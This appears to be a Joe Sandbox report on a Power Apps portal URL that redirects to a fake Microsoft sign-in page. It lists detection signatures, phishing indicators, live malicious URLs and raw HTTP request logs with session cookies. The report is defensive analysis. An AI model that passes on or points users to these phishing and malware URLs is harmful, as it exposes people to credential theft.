Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://site-xtxg5.powerappsportals.com/

Overview

General Information

Sample URL:https://site-xtxg5.powerappsportals.com/
Analysis ID:1635569
Infos:

Detection

HTMLPhisher
Score:64
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
Antivirus detection for URL or domain
Yara detected HtmlPhish10
Creates files inside the system directory
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
Invalid T&C link found

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6872 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 7064 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2016,i,7028593152666809667,3027904216886136172,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2072 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 2112 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://site-xtxg5.powerappsportals.com/" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
SourceRuleDescriptionAuthorStrings
3.8.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    3.9.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      No Sigma rule has matched
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: https://6068815810.sbs/google.phpAvira URL Cloud: Label: malware

      Phishing

      barindex
      Source: https://qbauyd.celestialjourney.it.com/ztNrN/Joe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown'., The legitimate domain for Microsoft is 'microsoft.com'., The provided URL 'qbauyd.celestialjourney.it.com' does not match the legitimate domain for Microsoft., The URL contains multiple subdomains and an unusual structure, which is a common tactic in phishing attempts., The domain 'it.com' is not associated with Microsoft and could be misleading., The presence of input fields for 'Email, phone, or Skype' is typical for phishing sites targeting Microsoft accounts. DOM: 3.8.pages.csv
      Source: Yara matchFile source: 3.8.pages.csv, type: HTML
      Source: Yara matchFile source: 3.9.pages.csv, type: HTML
      Source: https://qbauyd.celestialjourney.it.com/ztNrN/HTTP Parser: Number of links: 0
      Source: https://qbauyd.celestialjourney.it.com/ztNrN/HTTP Parser: <input type="password" .../> found but no <form action="...
      Source: https://qbauyd.celestialjourney.it.com/ztNrN/HTTP Parser: Title: Sign in to your account does not match URL
      Source: https://qbauyd.celestialjourney.it.com/ztNrN/HTTP Parser: Invalid link: Privacy statement
      Source: https://qbauyd.celestialjourney.it.com/ztNrN/HTTP Parser: Invalid link: Privacy statement
      Source: https://qbauyd.celestialjourney.it.com/ztNrN/HTTP Parser: <input type="password" .../> found
      Source: https://qbauyd.celestialjourney.it.com/ztNrN/HTTP Parser: No favicon
      Source: https://qbauyd.celestialjourney.it.com/ztNrN/HTTP Parser: No favicon
      Source: https://qbauyd.celestialjourney.it.com/ztNrN/HTTP Parser: No favicon
      Source: https://qbauyd.celestialjourney.it.com/ztNrN/HTTP Parser: No favicon
      Source: https://qbauyd.celestialjourney.it.com/ztNrN/HTTP Parser: No favicon
      Source: https://www.docdroid.com/nNVSVjJ/gr39475037090-2-pdfHTTP Parser: No <meta name="author".. found
      Source: https://www.docdroid.com/nNVSVjJ/gr39475037090-2-pdfHTTP Parser: No <meta name="author".. found
      Source: https://www.docdroid.com/nNVSVjJ/gr39475037090-2-pdfHTTP Parser: No <meta name="author".. found
      Source: https://qbauyd.celestialjourney.it.com/ztNrN/HTTP Parser: No <meta name="author".. found
      Source: https://qbauyd.celestialjourney.it.com/ztNrN/HTTP Parser: No <meta name="author".. found
      Source: https://www.docdroid.com/nNVSVjJ/gr39475037090-2-pdfHTTP Parser: No <meta name="copyright".. found
      Source: https://www.docdroid.com/nNVSVjJ/gr39475037090-2-pdfHTTP Parser: No <meta name="copyright".. found
      Source: https://www.docdroid.com/nNVSVjJ/gr39475037090-2-pdfHTTP Parser: No <meta name="copyright".. found
      Source: https://qbauyd.celestialjourney.it.com/ztNrN/HTTP Parser: No <meta name="copyright".. found
      Source: https://qbauyd.celestialjourney.it.com/ztNrN/HTTP Parser: No <meta name="copyright".. found
      Source: unknownHTTPS traffic detected: 23.60.203.209:443 -> 192.168.2.16:49742 version: TLS 1.2
      Source: chrome.exeMemory has grown: Private usage: 1MB later: 37MB
      Source: global trafficTCP traffic: 192.168.2.16:49806 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49806 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49806 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:49806 -> 1.1.1.1:53
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 23.60.203.209
      Source: unknownTCP traffic detected without corresponding DNS query: 23.60.203.209
      Source: unknownTCP traffic detected without corresponding DNS query: 23.60.203.209
      Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 23.60.203.209
      Source: unknownTCP traffic detected without corresponding DNS query: 23.60.203.209
      Source: unknownTCP traffic detected without corresponding DNS query: 23.60.203.209
      Source: unknownTCP traffic detected without corresponding DNS query: 23.60.203.209
      Source: unknownTCP traffic detected without corresponding DNS query: 23.60.203.209
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 2.19.122.22
      Source: unknownTCP traffic detected without corresponding DNS query: 2.19.122.22
      Source: unknownTCP traffic detected without corresponding DNS query: 2.19.122.22
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: site-xtxg5.powerappsportals.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /resource/powerappsportal/dist/font-awesome.BootstrapV5.bundle-2ce6efb497.css HTTP/1.1Host: content.powerapps.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://site-xtxg5.powerappsportals.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /bootstrap.min.css HTTP/1.1Host: site-xtxg5.powerappsportals.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://site-xtxg5.powerappsportals.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: Dynamics365PortalAnalytics=-X426o_n7LV_l9EVfGwYbZJqNsbDrBneVp9Xw7GM02cyineCif8EzcFhKgdBIUp7zsvodH2ZIVCiNAjTi5Bn40vb2E1EEfSF9bCSkEmbdC2R2eUMv8VOU5SezuRLAfPKW9fuJBaPaeTznslNXAQE_Q2; ASP.NET_SessionId=q4iizrklvnzhqaedyzoxxj0q; ARRAffinity=9d5c712db97a391b0b8f99b8dd9c9d585d7361345a8d3896caca159dfcb7c901; ARRAffinitySameSite=9d5c712db97a391b0b8f99b8dd9c9d585d7361345a8d3896caca159dfcb7c901
      Source: global trafficHTTP traffic detected: GET /theme.css HTTP/1.1Host: site-xtxg5.powerappsportals.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://site-xtxg5.powerappsportals.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: Dynamics365PortalAnalytics=-X426o_n7LV_l9EVfGwYbZJqNsbDrBneVp9Xw7GM02cyineCif8EzcFhKgdBIUp7zsvodH2ZIVCiNAjTi5Bn40vb2E1EEfSF9bCSkEmbdC2R2eUMv8VOU5SezuRLAfPKW9fuJBaPaeTznslNXAQE_Q2; ASP.NET_SessionId=q4iizrklvnzhqaedyzoxxj0q; ARRAffinity=9d5c712db97a391b0b8f99b8dd9c9d585d7361345a8d3896caca159dfcb7c901; ARRAffinitySameSite=9d5c712db97a391b0b8f99b8dd9c9d585d7361345a8d3896caca159dfcb7c901
      Source: global trafficHTTP traffic detected: GET /portalbasictheme.css HTTP/1.1Host: site-xtxg5.powerappsportals.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://site-xtxg5.powerappsportals.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: Dynamics365PortalAnalytics=-X426o_n7LV_l9EVfGwYbZJqNsbDrBneVp9Xw7GM02cyineCif8EzcFhKgdBIUp7zsvodH2ZIVCiNAjTi5Bn40vb2E1EEfSF9bCSkEmbdC2R2eUMv8VOU5SezuRLAfPKW9fuJBaPaeTznslNXAQE_Q2; ASP.NET_SessionId=q4iizrklvnzhqaedyzoxxj0q; ARRAffinity=9d5c712db97a391b0b8f99b8dd9c9d585d7361345a8d3896caca159dfcb7c901; ARRAffinitySameSite=9d5c712db97a391b0b8f99b8dd9c9d585d7361345a8d3896caca159dfcb7c901
      Source: global trafficHTTP traffic detected: GET /resource/powerappsportal/dist/preform.BootstrapV5.bundle-50672aa3f3.css HTTP/1.1Host: content.powerapps.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://site-xtxg5.powerappsportals.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /resource/powerappsportal/dist/pwa-style.bundle-2739c60227.css HTTP/1.1Host: content.powerapps.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://site-xtxg5.powerappsportals.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /resource/powerappsportal/dist/pcf-style.bundle-373a0f4982.css HTTP/1.1Host: content.powerapps.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://site-xtxg5.powerappsportals.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /_portal/d2c9c1cb-e35c-462e-996b-95a0b142a77b/Resources/ResourceManager?lang=en-US HTTP/1.1Host: site-xtxg5.powerappsportals.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://site-xtxg5.powerappsportals.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: Dynamics365PortalAnalytics=-X426o_n7LV_l9EVfGwYbZJqNsbDrBneVp9Xw7GM02cyineCif8EzcFhKgdBIUp7zsvodH2ZIVCiNAjTi5Bn40vb2E1EEfSF9bCSkEmbdC2R2eUMv8VOU5SezuRLAfPKW9fuJBaPaeTznslNXAQE_Q2; ASP.NET_SessionId=q4iizrklvnzhqaedyzoxxj0q; ARRAffinity=9d5c712db97a391b0b8f99b8dd9c9d585d7361345a8d3896caca159dfcb7c901; ARRAffinitySameSite=9d5c712db97a391b0b8f99b8dd9c9d585d7361345a8d3896caca159dfcb7c901
      Source: global trafficHTTP traffic detected: GET /resource/powerappsportal/img/web.png HTTP/1.1Host: content.powerapps.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://site-xtxg5.powerappsportals.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /resource/powerappsportal/img/close.png HTTP/1.1Host: content.powerapps.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://site-xtxg5.powerappsportals.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /resource/powerappsportal/dist/client-telemetry.bundle-f9f45b65a6.js HTTP/1.1Host: content.powerapps.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://site-xtxg5.powerappsportals.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /resource/powerappsportal/dist/client-telemetry-wrapper.bundle-633e70f51b.js HTTP/1.1Host: content.powerapps.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://site-xtxg5.powerappsportals.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /resource/powerappsportal/dist/preform.BootstrapV5.moment_2_29_4.bundle-cf8e0fd942.js HTTP/1.1Host: content.powerapps.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://site-xtxg5.powerappsportals.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /resource/powerappsportal/dist/pcf-dependency.bundle-805a1661b7.js HTTP/1.1Host: content.powerapps.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://site-xtxg5.powerappsportals.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /resource/powerappsportal/fonts/fa-solid-900.woff2 HTTP/1.1Host: content.powerapps.comConnection: keep-aliveOrigin: https://site-xtxg5.powerappsportals.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://content.powerapps.com/resource/powerappsportal/dist/font-awesome.BootstrapV5.bundle-2ce6efb497.cssAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /resource/powerappsportal/img/close.png HTTP/1.1Host: content.powerapps.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /resource/powerappsportal/img/web.png HTTP/1.1Host: content.powerapps.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /resource/powerappsportal/dist/pcf.bundle-582a4e04bd.js HTTP/1.1Host: content.powerapps.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://site-xtxg5.powerappsportals.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /resource/powerappsportal/dist/pcf-extended.bundle-b0e01b5622.js HTTP/1.1Host: content.powerapps.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://site-xtxg5.powerappsportals.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /resource/powerappsportal/dist/pcf-loader.bundle-f4a0e619b8.js HTTP/1.1Host: content.powerapps.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://site-xtxg5.powerappsportals.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /resource/powerappsportal/dist/bootstrap.BootstrapV5.bundle-be8391e97d.js HTTP/1.1Host: content.powerapps.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://site-xtxg5.powerappsportals.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /resource/powerappsportal/dist/postpreform.BootstrapV5.bundle-11a5a91493.js HTTP/1.1Host: content.powerapps.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://site-xtxg5.powerappsportals.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /resource/powerappsportal/dist/app.BootstrapV5.bundle-612df4da3a.js HTTP/1.1Host: content.powerapps.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://site-xtxg5.powerappsportals.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /js/script.manual.outbound-links.tagged-events.js HTTP/1.1Host: s.lunaweb.cloudConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://www.docdroid.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
